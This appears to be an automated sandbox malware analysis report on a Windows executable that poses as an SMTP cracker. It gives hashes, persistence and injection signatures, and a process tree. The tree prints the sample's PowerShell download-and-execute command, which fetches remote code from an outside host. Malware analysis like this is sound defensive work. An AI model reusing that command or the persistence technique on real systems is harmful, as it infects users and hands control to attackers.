Analysis
- max time kernel: 90s
- max time network: 46s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 17-05-2022 13:06

Static task: static1

Behavioral task: behavioral1
- Sample: 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
- Resource: win7-20220414-en

Behavioral task: behavioral2
- Sample: 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
- Resource: win10v2004-20220414-en
General
- Target: 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
- Size: 6.1MB
- MD5: 5f9e61796a21e65f9a03f92ee6a8f6d8
- SHA1: d6032fd04db0fbb6195b6e8d31491a3fc289f1ce
- SHA256: 2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba
- SHA512: 402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb
Malware Config
- Extracted: http://supportnimbuzz.hexat.com/3/Att.jpg
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    4, 1164, powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes (pid, process):
    1860, WinUpdat.exe
    2024, WinUpdat.exe
- Drops startup file (1 IoC)
  Processes (description, ioc, process):
    File created, C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinUpdat.vbs, WScript.exe
- Loads dropped DLL (13 IoCs)
  Processes (pid, process):
    1012, 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe (2 entries)
    984, (no process name in report)
    1860, WinUpdat.exe
    2024, WinUpdat.exe (9 entries)
- Detects Pyinstaller (7 IoCs)
  Processes (resource, yara_rule):
    \Users\Admin\AppData\Local\Temp\WinUpdat.exe, pyinstaller (4 entries)
    C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe, pyinstaller (3 entries)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid, process):
    1164, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
    Token: SeDebugPrivilege, 1164, powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes (description, pid, process, target process):
    PID 1012 wrote to memory of 1860, 1012, 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe, WinUpdat.exe (4 entries)
    PID 1860 wrote to memory of 2024, 1860, WinUpdat.exe, WinUpdat.exe (3 entries)
    PID 1012 wrote to memory of 2004, 1012, 2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe, WScript.exe (4 entries)
    PID 2024 wrote to memory of 1812, 2024, WinUpdat.exe, cmd.exe (3 entries)
    PID 2004 wrote to memory of 1164, 2004, WScript.exe, powershell.exe (4 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"
    Signatures: Drops startup file; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads